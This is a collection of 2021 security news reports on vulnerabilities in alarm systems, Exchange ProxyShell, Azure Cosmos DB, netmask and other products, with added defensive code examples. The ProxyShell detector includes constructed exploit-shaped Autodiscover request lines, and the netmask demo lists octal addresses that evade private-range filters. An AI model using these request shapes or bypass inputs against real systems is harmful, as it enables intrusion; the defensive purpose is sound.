The Fortress S03 Wi-Fi Home Security System is a do-it-yourself (DIY) alarm system that enables users to secure their homes and small businesses from burglars, fires, gas leaks, and water leaks by leveraging Wi-Fi and RFID technology for keyless entry. The company's security and surveillance systems are used by "thousands of clients and continued customers," according to its website.

Calling the vulnerabilities "trivially easy to exploit," Rapid7 researchers noted that CVE-2021-39276 concerns unauthenticated API access that enables an attacker in possession of a victim's email address to query the API and leak the device's International Mobile Equipment Identity (IMEI) number, which also doubles as the serial number. Armed with the device's IMEI number and the email address, the adversary can proceed to make a number of unauthorized changes, such as disabling the alarm system via an unauthenticated POST request.

CVE-2021-39277, on the other hand, relates to an RF signal replay attack: a lack of adequate encryption lets the bad actor capture the radio-frequency command-and-control communications over the air using a software-defined radio (SDR) and play the transmission back to perform specific functions, such as "arm" and "disarm" operations, on the target device.

"For CVE-2021-39276, an attacker with the knowledge of a Fortress S03 user's email address can easily disarm the installed home alarm without that user's knowledge," the researchers said in a report shared with The Hacker News.

"CVE-2021-39277 presents similar problems, but requires less prior knowledge of the victim, as the attacker can simply stake out the property and wait for the victim to use the RF-controlled devices within radio range. The attacker can then replay the 'disarm' command later, without the victim's knowledge."

Rapid7 said it notified Fortress Security of the bugs on May 13, 2021, only for the company to close the report 11 days later on May 24. We have reached out to Fortress Security for comment, and we will update the story if we hear back.

In light of the fact that the issues continue to persist, it's recommended that users configure their alarm systems with a unique, one-time email address to work around the IMEI number exposure.

"For CVE-2021-39277, there seems to be very little a user can do to mitigate the effects of the RF replay issues absent a firmware update to enforce cryptographic controls on RF signals. Users concerned about this exposure should avoid using the key fobs and other RF devices linked to their home security systems," the researchers said.
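The RF replay problem and the "cryptographic controls on RF signals" the researchers call for, modelled as an added example (this is not Fortress firmware or Rapid7 code; the key, device id, frame layout and acceptance window are assumptions). A fixed "disarm" transmission is accepted however many times an SDR capture is replayed; a frame that binds a monotonic counter and a MAC to the command is accepted once and refused thereafter, and any byte an attacker alters breaks the MAC.

```python
"""Static RF command frames versus authenticated, counter-bound frames.

Added example for this page, not Fortress firmware or Rapid7's research code.
It models the two designs the article contrasts: a fixed 'disarm' transmission
that any capture can replay, and a frame carrying a monotonic counter and a
MAC so a replayed or altered capture is refused. Key, device id, frame layout
and acceptance window are illustrative assumptions.
"""
import hashlib
import hmac
import struct
from typing import Dict

DEMO_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed fob/panel secret
DEVICE_ID = 0x1234
TAG_LEN = 8                     # truncated HMAC-SHA256 tag carried over the air
HEADER = struct.Struct(">IQ")   # device id (4 bytes) + counter (8 bytes)


# --- Design 1: the command is the whole message --------------------------------
def static_frame(cmd: str) -> bytes:
    return cmd.encode()


class StaticReceiver:
    """Accepts any well-formed command, however many times it was seen before."""
    def accept(self, frame: bytes) -> bool:
        return frame in (b"arm", b"disarm")


# --- Design 2: counter + MAC over (device id, counter, command) ----------------
def auth_frame(key: bytes, device_id: int, counter: int, cmd: str) -> bytes:
    body = HEADER.pack(device_id, counter) + cmd.encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]
    return body + tag


class AuthReceiver:
    def __init__(self, key: bytes, device_id: int, window: int = 16):
        self.key = key
        self.device_id = device_id
        self.last_counter = -1      # highest counter accepted so far
        self.window = window        # tolerate a few presses made out of range

    def accept(self, frame: bytes) -> bool:
        if len(frame) < HEADER.size + TAG_LEN:
            return False
        body, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):
            return False            # forged or altered
        device_id, counter = HEADER.unpack(body[:HEADER.size])
        if device_id != self.device_id:
            return False
        if counter <= self.last_counter or counter > self.last_counter + self.window:
            return False            # replayed, or too far ahead to trust
        self.last_counter = counter
        return True


def simulate() -> Dict[str, bool]:
    """Attacker records a fob transmission over the air and replays it later."""
    results: Dict[str, bool] = {}

    static_rx = StaticReceiver()
    capture = static_frame("disarm")
    results["static_live"] = static_rx.accept(capture)
    results["static_replay"] = static_rx.accept(capture)       # still works

    rx = AuthReceiver(DEMO_KEY, DEVICE_ID)
    counter = 0

    def fob_press(cmd: str) -> bytes:
        nonlocal counter
        counter += 1
        return auth_frame(DEMO_KEY, DEVICE_ID, counter, cmd)

    capture = fob_press("disarm")
    results["auth_live"] = rx.accept(capture)
    results["auth_replay"] = rx.accept(capture)                # counter already used
    altered = bytearray(fob_press("arm"))
    altered[HEADER.size] ^= 0x01                               # flip a command byte
    results["auth_altered"] = rx.accept(bytes(altered))        # MAC no longer matches
    results["auth_next_press"] = rx.accept(fob_press("arm"))   # legitimate traffic still flows
    return results


if __name__ == "__main__":
    for name, ok in simulate().items():
        print(f"{name:16s} {'accepted' if ok else 'rejected'}")
```

A one-way counter scheme like this is the minimum that defeats straight replay; it still needs a resynchronisation path for a fob pressed many times out of range, and a panel that can transmit can do better with a challenge-response so that nothing the attacker records is ever valid later.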


Kaseya Issues Patches for Two New 0-Day Flaws Affecting Unitrends Servers
28.8.21 
Vulnerebility  Thehackernews
U.S. technology firm Kaseya has released security patches to address two zero-day vulnerabilities affecting its Unitrends enterprise backup and continuity solution that could result in privilege escalation and authenticated remote code execution.

The two weaknesses are part of a trio of vulnerabilities discovered and reported by researchers at the Dutch Institute for Vulnerability Disclosure (DIVD) on July 3, 2021.

The IT infrastructure management solution provider has addressed the issues in server software version 10.5.5-2 released on August 12, DIVD said. An as-yet-undisclosed client-side vulnerability in Kaseya Unitrends remains unpatched, but the company has published firewall rules that can be applied to filter traffic to and from the client and mitigate any risk associated with the flaw. As an additional precaution, it's recommended not to leave the servers accessible over the internet.

Although specifics related to the vulnerabilities are sparse, the shortcomings concern an authenticated remote code execution vulnerability as well as a privilege escalation flaw from read-only user to admin on Unitrends servers, both of which hinge on the possibility that an attacker has already gained an initial foothold on a target's network, making them more difficult to exploit.

The disclosure comes close to two months after the company suffered a crippling ransomware strike on its VSA on-premises product, leading to the mysterious shutdown of REvil cybercrime syndicate in the following weeks. Kaseya has since shipped fixes for the zero-days that were exploited to gain access to the on-premise servers, and late last month, said it obtained a universal decryptor "to remediate customers impacted by the incident."


Critical Cosmos Database Flaw Affected Thousands of Microsoft Azure Customers
27.8.21 
Vulnerebility  Thehackernews

Cloud infrastructure security company Wiz on Thursday revealed details of a now-fixed Azure Cosmos database vulnerability that could have been potentially exploited to grant any Azure user full admin access to other customers' database instances without any authorization.

The flaw, which grants read, write, and delete privileges, has been dubbed "ChaosDB," with Wiz researchers noting that "the vulnerability has a trivial exploit that doesn't require any previous access to the target environment, and impacts thousands of organizations, including numerous Fortune 500 companies."

Cosmos DB is Microsoft's proprietary NoSQL database that's advertised as "a fully managed service" that "takes database administration off your hands with automatic management, updates and patching."

The Wiz Research Team reported the issue to Microsoft on August 12, after which the Windows maker took steps to mitigate the issue within 48 hours of responsible disclosure, in addition to awarding a $40,000 bounty to the finders on August 17.

"We have no indication that external entities outside the researcher had access to the primary read-write key associated with your Azure Cosmos DB account(s)," Microsoft said in a statement. "In addition, we are not aware of any data access because of this vulnerability. Azure Cosmos DB accounts with a vNET or firewall enabled are protected by additional security mechanisms that prevent risk of unauthorized access."

The exploit identified by Wiz concerns a chain of vulnerabilities in the Jupyter Notebook feature of Cosmos DB, enabling an adversary to obtain the credentials corresponding to the target Cosmos DB account, including the Primary Key, which provides access to the administrative resources for the database account.

"Using these credentials, it is possible to view, modify, and delete data in the target Cosmos DB account via multiple channels," the researchers said. As a consequence, any Cosmos DB asset that has the Jupyter Notebook feature enabled is potentially impacted.

Although Microsoft notified over 30% of Cosmos DB customers about the potential security breach, Wiz expects the actual number to be much higher, given that the vulnerability has been exploitable for months.

"Every Cosmos DB customer should assume they've been exposed," Wiz researchers noted, adding, "we also recommend reviewing all past activity in your Cosmos DB account." Additionally, Microsoft is also urging its customers to regenerate their Cosmos DB Primary Keys to mitigate any risk arising from the flaw.


F5 Releases Critical Security Patch for BIG-IP and BIG-IQ Devices
27.8.21 
Vulnerebility  Thehackernews

Enterprise security and network appliance vendor F5 has released patches for more than two dozen security vulnerabilities affecting multiple versions of BIG-IP and BIG-IQ devices that could potentially allow an attacker to perform a wide range of malicious actions, including accessing arbitrary files, escalating privileges, and executing JavaScript code.

Of the 29 bugs addressed, 13 are high-severity flaws, 15 are rated medium, and one is rated low in severity.

Chief among them is CVE-2021-23031 (CVSS score: 8.8), a vulnerability affecting BIG-IP Advanced Web Application Firewall and BIG-IP Application Security Manager that allows an authenticated user to perform a privilege escalation.

"When this vulnerability is exploited, an authenticated attacker with access to the Configuration utility can execute arbitrary system commands, create or delete files, and/or disable services. This vulnerability may result in complete system compromise," F5 said in its advisory.

It's worth noting that for customers running the device in Appliance Mode, which applies additional technical restrictions in sensitive sectors, the same vulnerability comes with a critical rating of 9.9 out of 10. "As this attack is conducted by legitimate, authenticated users, there is no viable mitigation that also allows users access to the Configuration utility. The only mitigation is to remove access for users who are not completely trusted," the company said.

The other major vulnerabilities resolved by F5 are listed below -

CVE-2021-23025 (CVSS score: 7.2) - Authenticated remote command execution vulnerability in BIG-IP Configuration utility
CVE-2021-23026 (CVSS score: 7.5) - Cross-site request forgery (CSRF) vulnerability in iControl SOAP
CVE-2021-23027 and CVE-2021-23037 (CVSS score: 7.5) - TMUI DOM-based and reflected cross-site scripting (XSS) vulnerabilities
CVE-2021-23028 (CVSS score: 7.5) - BIG-IP Advanced WAF and ASM vulnerability
CVE-2021-23029 (CVSS score: 7.5) - BIG-IP Advanced WAF and ASM TMUI vulnerability
CVE-2021-23030 and CVE-2021-23033 (CVSS score: 7.5) - BIG-IP Advanced WAF and ASM Websocket vulnerabilities
CVE-2021-23032 (CVSS score: 7.5) - BIG-IP DNS vulnerability
CVE-2021-23034, CVE-2021-23035, and CVE-2021-23036 (CVSS score: 7.5) - Traffic Management Microkernel vulnerabilities
Additionally, F5 has also patched a number of flaws that range from directory traversal vulnerability and SQL injection to open redirect vulnerability and cross-site request forgery, as well as a MySQL database flaw that results in the database consuming more storage space than expected when brute-force protection features of the firewall are enabled.

With F5 devices often becoming juicy targets for active exploitation attempts by threat actors, it's highly recommended that users and administrators install updated software or apply the necessary mitigations as soon as possible.


VMware Issues Patches to Fix New Flaws Affecting Multiple Products
27.8.21 
Vulnerebility  Thehackernews
VMware on Wednesday shipped security updates to address vulnerabilities in multiple products that could be potentially exploited by an attacker to take control of an affected system.

The six security weaknesses (from CVE-2021-22022 through CVE-2021-22027, CVSS scores: 4.4 - 8.6) affect VMware vRealize Operations (prior to version 8.5.0), VMware Cloud Foundation (versions 3.x and 4.x), and vRealize Suite Lifecycle Manager (version 8.x), as listed below -

CVE-2021-22022 (CVSS score: 4.4) - Arbitrary file read vulnerability in vRealize Operations Manager API, leading to information disclosure
CVE-2021-22023 (CVSS score: 6.6) - Insecure direct object reference vulnerability in vRealize Operations Manager API, enabling an attacker with administrative access to alter other users' information and seize control of an account
CVE-2021-22024 (CVSS score: 7.5) - Arbitrary log-file read vulnerability in vRealize Operations Manager API, resulting in sensitive information disclosure
CVE-2021-22025 (CVSS score: 8.6) - Broken access control vulnerability in vRealize Operations Manager API, allowing an unauthenticated malicious actor to add new nodes to the existing vROps cluster
CVE-2021-22026 and CVE-2021-22027 (CVSS score: 7.5) - Server Side Request Forgery vulnerability in vRealize Operations Manager API, leading to information disclosure
Credited with reporting the flaws are Egor Dimitrenko of Positive Technologies (CVE-2021-22022 and CVE-2021-22023) and thiscodecc of MoyunSec V-Lab (from CVE-2021-22024 to CVE-2021-22027).

Separately, VMware has also issued patches to remediate a cross-site scripting (XSS) vulnerability impacting VMware vRealize Log Insight and VMware Cloud Foundation that stems from a case of improper user input validation, enabling an adversary with user privileges to inject malicious payloads via the Log Insight UI that's executed when a victim accesses the shared dashboard link.

The flaw, which has been assigned the identifier CVE-2021-22021, has been rated 6.5 for severity on the CVSS scoring system. Marcin Kot of Prevenity and Tran Viet Quang of Vantage Point Security have been credited for independently discovering and reporting the vulnerability.

The patches also arrive a week after VMware patched a denial-of-service bug in its VMware Workspace ONE UEM console (CVE-2021-22029, CVSS score: 5.3) that an actor with access to "/API/system/admins/session" could abuse to render the API unavailable due to improper rate limiting.


Critical Flaw Discovered in Cisco APIC for Switches — Patch Released
27.8.21 
Vulnerebility  Thehackernews
Cisco Systems on Wednesday issued patches to address a critical security vulnerability affecting the Application Policy Infrastructure Controller (APIC) interface used in its Nexus 9000 Series Switches that could be potentially abused to read or write arbitrary files on a vulnerable system.

Tracked as CVE-2021-1577 (CVSS score: 9.1), the issue — which is due to improper access control — could enable an unauthenticated, remote attacker to upload a file to the appliances. "A successful exploit could allow the attacker to read or write arbitrary files on an affected device," the company said in an advisory.

The APIC appliance is a centralized, clustered controller that programmatically automates network provisioning and control based on the application requirements and policies across physical and virtual environments.

Cisco said it discovered the vulnerability during internal security testing by the Cisco Advanced Security Initiatives Group (ASIG).

Additionally, the network equipment major said it concluded its investigation into a new BadAlloc flaw in BlackBerry's QNX real-time operating system, reported on August 17 by the Canadian company. "Cisco has completed its investigation into its product line to determine which products may be affected by this vulnerability. No products are known to be affected," it noted.

Cisco products that run QNX are listed below -

Channelized shared port adapters (SPAs) (CSCvz34866)
Circuit Emulation over Packet (CEoP) SPAs (CSCvz34865)
IOS XR 32-bit Software (CSCvz34871)
RF Gateway 10 (CSCvz34869)


Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems
23.8.21 
Vulnerebility  Thehackernews

Close to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.

That's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm Trend Micro, detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.

The company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.

In addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) —

CVE-2017-5638 (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability
CVE-2017-9805 (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability
CVE-2018-7600 (CVSS score: 9.8) - Drupal Core RCE vulnerability
CVE-2020-14750 (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability
CVE-2020-25213 (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability
CVE-2020-17496 (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability
CVE-2020-11651 (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability
CVE-2017-12611 (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability
CVE-2017-7657 (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability
CVE-2021-29441 (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability
CVE-2020-14179 (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability
CVE-2013-4547 (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability
CVE-2019-0230 (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability
CVE-2018-11776 (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability
CVE-2020-7961 (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability

Even more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository have been revealed to harbor hundreds of vulnerabilities spanning python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to secure containers against a wide range of potential threats at each stage of the development pipeline.

"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model," the researchers concluded.


WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws
20.8.21 
Vulnerebility  Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency is warning of active exploitation attempts that leverage the latest line of "ProxyShell" Microsoft Exchange vulnerabilities, which were patched earlier this year, including deploying LockFile ransomware on compromised systems.

Tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities enable adversaries to bypass ACL controls and elevate privileges on the Exchange PowerShell backend, effectively permitting unauthenticated remote code execution. While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows maker's May Patch Tuesday updates.

"An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine," CISA said.

The development comes a little over a week after cybersecurity researchers sounded the alarm on opportunistic scanning and exploitation of unpatched Exchange servers by taking advantage of the ProxyShell attack chain.

[Image: ProxyShell flaws. Image source: Huntress Labs]
Originally demonstrated at the Pwn2Own hacking contest in April this year, ProxyShell is part of a broader trio of exploit chains discovered by DEVCORE security researcher Orange Tsai that includes ProxyLogon and ProxyOracle, the latter of which chains a reflected cross-site scripting flaw with a padding oracle to recover a user's password in plaintext.

"They're backdooring boxes with webshells that drop other webshells and also executables that periodically call out," researcher Kevin Beaumont noted last week.

Now, according to researchers from Huntress Labs, at least five distinct styles of web shells have been observed deployed to vulnerable Microsoft Exchange servers, with over 100 incidents related to the exploit reported between August 17 and 18. Web shells grant the attackers remote access to the compromised servers, but it isn't clear exactly what the goals are or the extent to which all the flaws were used.

More than 140 web shells have been detected across no fewer than 1,900 unpatched Exchange servers to date, Huntress Labs CEO Kyle Hanslovan tweeted, adding "impacted [organizations] thus far include building manufacturing, seafood processors, industrial machinery, auto repair shops, a small residential airport and more."
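A first-pass detection for the scanning and exploitation described above, added here as an example (it is not Huntress or CISA tooling, and the IIS log excerpt is constructed). It flags the publicly documented CVE-2021-34473 request shape: a hit on /autodiscover/autodiscover.json whose query string starts with "@host" and smuggles a backend path such as /mapi/nspi or /powershell together with a second "Email=autodiscover/autodiscover.json?@host" parameter.

```python
"""Flag ProxyShell-style Autodiscover path-confusion requests in IIS logs.

Added example for this page, not vendor or agency tooling. The log excerpt is
constructed; the column order is read from the log's own #Fields line rather
than assumed, since IIS sites log different field sets.
"""
from typing import Dict, List
from urllib.parse import unquote

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-08-17 10:00:01 10.0.0.5 GET /owa/auth/logon.aspx url=https://mail.example.test/owa/ 443 - 203.0.113.7 Mozilla/5.0 200
2021-08-17 10:00:09 10.0.0.5 GET /autodiscover/autodiscover.json @evil.test/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.test 443 - 198.51.100.23 python-requests/2.25.1 200
2021-08-17 10:00:10 10.0.0.5 POST /autodiscover/autodiscover.json @evil.test/powershell/?&Email=autodiscover/autodiscover.json%3F@evil.test 443 - 198.51.100.23 python-requests/2.25.1 200
2021-08-17 10:01:13 10.0.0.5 GET /autodiscover/autodiscover.json Email=user@example.test 443 - 203.0.113.9 Microsoft%20Office/16.0 200
2021-08-17 10:02:44 10.0.0.5 POST /owa/auth.owa - 443 - 203.0.113.7 Mozilla/5.0 302
"""

# Backend paths the attacker names after '@host' to reach through the frontend.
BACKEND_PATHS = ("/mapi/nspi", "/powershell", "/ews/", "/ecp/", "/owa/")


def is_proxyshell_request(stem: str, query: str) -> bool:
    """True for the Autodiscover path-confusion pattern; case and URL
    encoding are normalised because scanners vary both."""
    if not stem.lower().endswith("/autodiscover/autodiscover.json"):
        return False
    q = unquote(query).lower()
    if not q.startswith("@"):
        return False    # legitimate Autodiscover queries begin with Email= or similar
    return "autodiscover.json?@" in q or any(p in q for p in BACKEND_PATHS)


def parse_iis_w3c(text: str) -> List[Dict[str, str]]:
    """One dict per request line, keyed by the names in the #Fields directive."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()     # IIS encodes spaces inside fields, so this is safe
        if fields and len(values) == len(fields):
            records.append(dict(zip(fields, values)))
    return records


def detect(text: str) -> List[Dict[str, str]]:
    """Return the suspicious requests with the columns an analyst pivots on."""
    hits = []
    for rec in parse_iis_w3c(text):
        if is_proxyshell_request(rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", "")):
            hits.append({k: rec[k] for k in ("date", "time", "c-ip", "cs-method", "cs-uri-query")})
    return hits


if __name__ == "__main__":
    for h in detect(SAMPLE_LOG):
        print(h["date"], h["time"], h["c-ip"], h["cs-method"], unquote(h["cs-uri-query"]))
```

A match is evidence of an attempt, not of success: the next things to check are the response codes on the follow-on /powershell and /ews requests from the same client and the Exchange PowerShell and mailbox-export logs, since the web shells described above arrive through a mailbox export written into a web-accessible path.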


Vulnerability in 'netmask' npm Package Affects 280,000 Projects
30.3.2021 
Vulnerebility  Securityweek

A vulnerability in the netmask npm package could expose private networks and lead to a variety of attacks, including malware delivery.

The newly identified issue (tracked as CVE-2021-28918) stems from the package mishandling octal notation, causing it to misinterpret supplied IP addresses.

Designed to parse IPv4 CIDR blocks to allow for their comparison and exploration, netmask is highly popular, registering millions of weekly downloads. At the moment, it is used by more than 278,000 other projects.

Because of this bug, netmask would consider private IP addresses as external IP addresses and the other way around, thus opening the door to a wide range of attacks, depending on the manner in which the package is used.

Some of the possible attacks include server-side request forgery, remote file inclusion, and local file inclusion, among others, a security researcher going by the name of Sick Codes explains.

Working together with application developer and researcher Victor Viale, Sick Codes discovered that netmask reads an IP address whose first octet starts with 0, which by convention denotes octal, as a plain decimal value.

A remote, unauthenticated attacker could leverage the vulnerability to trick an application using the flawed package into fetching malicious code from an external IP address as if it was supplied from within the local network.

“A remote authenticated or unauthenticated attacker can bypass packages that rely on netmask to filter IP address blocks to reach intranets, VPNs, containers, adjacent VPC instances, or LAN hosts using input data such as 012.0.0.1 (10.0.0.1), which netmask evaluates as 12.0.0.1 (public),” Sick Codes explains.

Even if a browser recognizes octal strings, a Node.js application relying on netmask does not, so users can submit malicious URLs that appear internal but in reality lead to remote files.

“You don’t need a special IP address to do this though, you can simply submit a public URL and get local files back. There’s literally so many vulnerabilities caused by this that it will make your head spin,” the researcher adds.
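The disagreement the researcher describes, reproduced as an added example in Python (this is not the netmask package's code). One parser mimics the bug by reading every dotted component as decimal; the other applies the classic BSD inet_aton rules that libc, curl and browsers follow, where a leading 0 means octal and 0x means hex, and it goes a little beyond the article by also accepting inet_aton's short forms such as "0x7f.1". The same string lands in a different network under each, which is the whole attack.

```python
"""Octal-octet confusion behind CVE-2021-28918, reproduced in Python.

Added example, not the netmask package's code. naive_parse() mimics the buggy
behaviour (every component read as decimal); inet_aton_parse() follows the BSD
inet_aton rules (leading 0 = octal, 0x = hex, fewer than four components
allowed), so the two disagree on exactly the inputs the article cites.
"""
import ipaddress
from typing import Dict

PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_private(addr: ipaddress.IPv4Address) -> bool:
    return any(addr in net for net in PRIVATE_NETS)


def naive_parse(text: str) -> ipaddress.IPv4Address:
    """Buggy: int('012') == 12, so '012.0.0.1' becomes 12.0.0.1 (public)."""
    parts = text.split(".")
    if len(parts) != 4:
        raise ValueError(f"expected four components: {text!r}")
    octets = [int(p, 10) for p in parts]
    if any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"octet out of range: {text!r}")
    return ipaddress.IPv4Address(".".join(str(o) for o in octets))


def _component(p: str) -> int:
    if p[:2].lower() == "0x":
        return int(p[2:], 16)          # hex
    if len(p) > 1 and p[0] == "0":
        return int(p, 8)               # leading zero: octal
    return int(p, 10)


def inet_aton_parse(text: str) -> ipaddress.IPv4Address:
    """inet_aton semantics: a.b.c.d, a.b.c, a.b or a; each component may be
    decimal, octal or hex, and the last component fills the remaining bytes."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4 or any(p == "" for p in parts):
        raise ValueError(f"malformed address: {text!r}")
    vals = [_component(p) for p in parts]
    if any(v > 0xFF for v in vals[:-1]):
        raise ValueError(f"component out of range: {text!r}")
    tail_bytes = 4 - (len(vals) - 1)
    if vals[-1] >= 1 << (8 * tail_bytes):
        raise ValueError(f"last component out of range: {text!r}")
    n = 0
    for v in vals[:-1]:
        n = (n << 8) | v
    n = (n << (8 * tail_bytes)) | vals[-1]
    return ipaddress.IPv4Address(n)


def compare(text: str) -> Dict[str, object]:
    """How a netmask-style filter and a real socket library see one string."""
    try:
        naive = naive_parse(text)
        naive_view = (str(naive), is_private(naive))
    except ValueError:
        naive_view = ("invalid", False)
    strict = inet_aton_parse(text)
    return {"input": text,
            "naive": naive_view[0], "naive_private": naive_view[1],
            "inet_aton": str(strict), "inet_aton_private": is_private(strict)}


if __name__ == "__main__":
    for s in ("012.0.0.1", "0177.0.0.1", "0x7f.1", "0300.0250.0.1"):
        print(compare(s))
```

The safe fix is not to teach the allow-list parser every notation but to canonicalise first: resolve the string with the same routine the socket layer will use, then apply the private-range check to the resulting address, so the filter and the connection can never disagree.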

The netmask package, which is maintained by Marcus Dunn, director of engineering at Netflix, was patched within days after the vulnerability was responsibly reported.

The fix covered the manner in which netmask interprets octal (base-8) and hexadecimal (base-16) input, as well as input containing whitespace. All other packages and APIs that leverage netmask need to be updated to address the potential exposure to attacks.


Solarwinds Orion Platform updates fix two remote code execution issues
27.3.2021 
Vulnerebility  Securityaffairs

SolarWinds released security updates that address multiple vulnerabilities, including two flaws that could be exploited by attackers for remote code execution.
Solarwinds has released a major security update to address multiple security vulnerabilities affecting the Orion Platform, the one that was involved in the Solarwinds supply chain attack.

The software vendor released Orion Platform version 2020.2.5 to fix the issues, the most severe of which is a critical remote code execution vulnerability. The flaw is an RCE via Actions and JSON deserialization that could be exploited by an authenticated attacker; it was reported via Trend Micro's Zero Day Initiative (ZDI).

“A remote code execution vulnerability has been found via the test alert actions. An Orion authenticated user is required to exploit this.” reads the advisory.

The vendor did not disclose technical details of the vulnerability to avoid its exploitation in the wild.
The company also addressed another RCE, rated high severity, that could be exploited by an attacker who knows the credentials of an unprivileged local account on the Orion Server.

“The vulnerability can be used to achieve authenticated RCE as Administrator. In order to exploit this, an attacker first needs to know the credentials of an unprivileged local account on the Orion Server.” states the advisory.

The flaw was reported by security researcher Harrison Neal via Trend Micro's ZDI.

The latest version also addressed a Reverse Tabnabbing and Open Redirect issue and a Stored XSS in Customize view, respectively tracked as CVE-2021-3109 and CVE-2020-35856 and rated as medium and high severity.

“A stored XSS vulnerability was found in the add custom tab within customize view page by a security researcher. This vulnerability requires Orion administrator account to exploit this.” states the advisory.


Severe Flaws in Official 'Facebook for WordPress' Plugin
27.3.2021 
Vulnerebility  Securityweek

A critical vulnerability in the official Facebook for WordPress plugin could be abused to upload arbitrary files, essentially leading to remote code execution, according to a warning from security researchers at Wordfence.

Formerly known as Official Facebook Pixel, the Facebook for WordPress plugin is used on more than 500,000 sites, allowing administrators to capture actions that visitors take when interacting with the page.

The bug carries a CVSS score of 9.0 and was reported to Facebook on December 22. Wordfence said the critical severity bug could allow an unauthenticated attacker to access a site’s secret and exploit a deserialization weakness to achieve remote code execution.

Described as a “PHP object injection with POP chain,” the vulnerability existed because the nonce that a function in Facebook for WordPress required could be generated using a custom script, and because a variable in a function meant to deserialize user data could be supplied by the user themselves.

“When user-supplied input is deserialized in PHP, users can supply PHP objects that can trigger magic methods and execute actions that can be used for malicious purposes,” the company said in an advisory.

They also note that, while a deserialization vulnerability could be relatively harmless on its own, the addition of a gadget, or magic method, to the mix would result in “significant damage” to a site. The bug in Facebook for WordPress could be combined with a magic method to upload arbitrary files, leading to remote code execution.

By abusing the vulnerability, an attacker could generate a PHP file in the home directory of a vulnerable website, then change the contents of that PHP file to whatever they wanted, achieving code execution.

After Facebook patched the flaw, the security researchers discovered a Cross-Site Request Forgery to Stored Cross-Site Scripting vulnerability in the updated plugin, and reported it on January 27. Patched in February, the issue was rooted in rewritten code that modified some of the plugin’s initial functionality related to saving the plugin’s settings.

“This function is used to update the plugin’s settings with the Facebook Pixel ID, access token, and external business key. These settings help establish a connection with the Facebook pixel console so that event data can be sent from the WordPress site to the appropriate Facebook pixel account,” Wordfence explains.

The function lacked nonce protection, meaning that it could not verify whether requests came from a legitimate authenticated administrator, thus allowing an attacker to "craft a request that would be executed if they could trick an administrator into performing an action while authenticated to the target site."

An attacker could abuse the action to update the plugin’s settings and steal metric data for a site, and even inject malicious JavaScript code into the setting values. The code would be executed in the admin’s browser when they access the settings page, and could allow for the injection of backdoors into theme files, or for the creation of new administrative accounts, leading to complete site takeover.


Critical Flaw in Jabber for Windows Could Lead to Code Execution
27.3.2021 
Vulnerebility  Securityweek

Cisco this week announced the release of software updates that address several vulnerabilities in Jabber for desktop and mobile platforms, the most severe of which could be abused to execute arbitrary code with elevated privileges.

The bugs impact Cisco Jabber for Windows, macOS, and mobile platforms, and are not dependent on one another. To successfully exploit them, an attacker would need to be authenticated to an Extensible Messaging and Presence Protocol (XMPP) server in use by the affected software and be able to send XMPP messages.

The most important of them is CVE-2021-1411, a critical arbitrary program execution flaw in Jabber for Windows, which exists because of improper validation of message content. Successful exploitation of this vulnerability could result in code execution, Cisco explains.

Next in line is CVE-2021-1469, a high-severity security hole in Jabber for Windows that, similarly to CVE-2021-1411, could lead to code execution. The third issue is CVE-2021-1417, a medium-severity vulnerability leading to information disclosure.

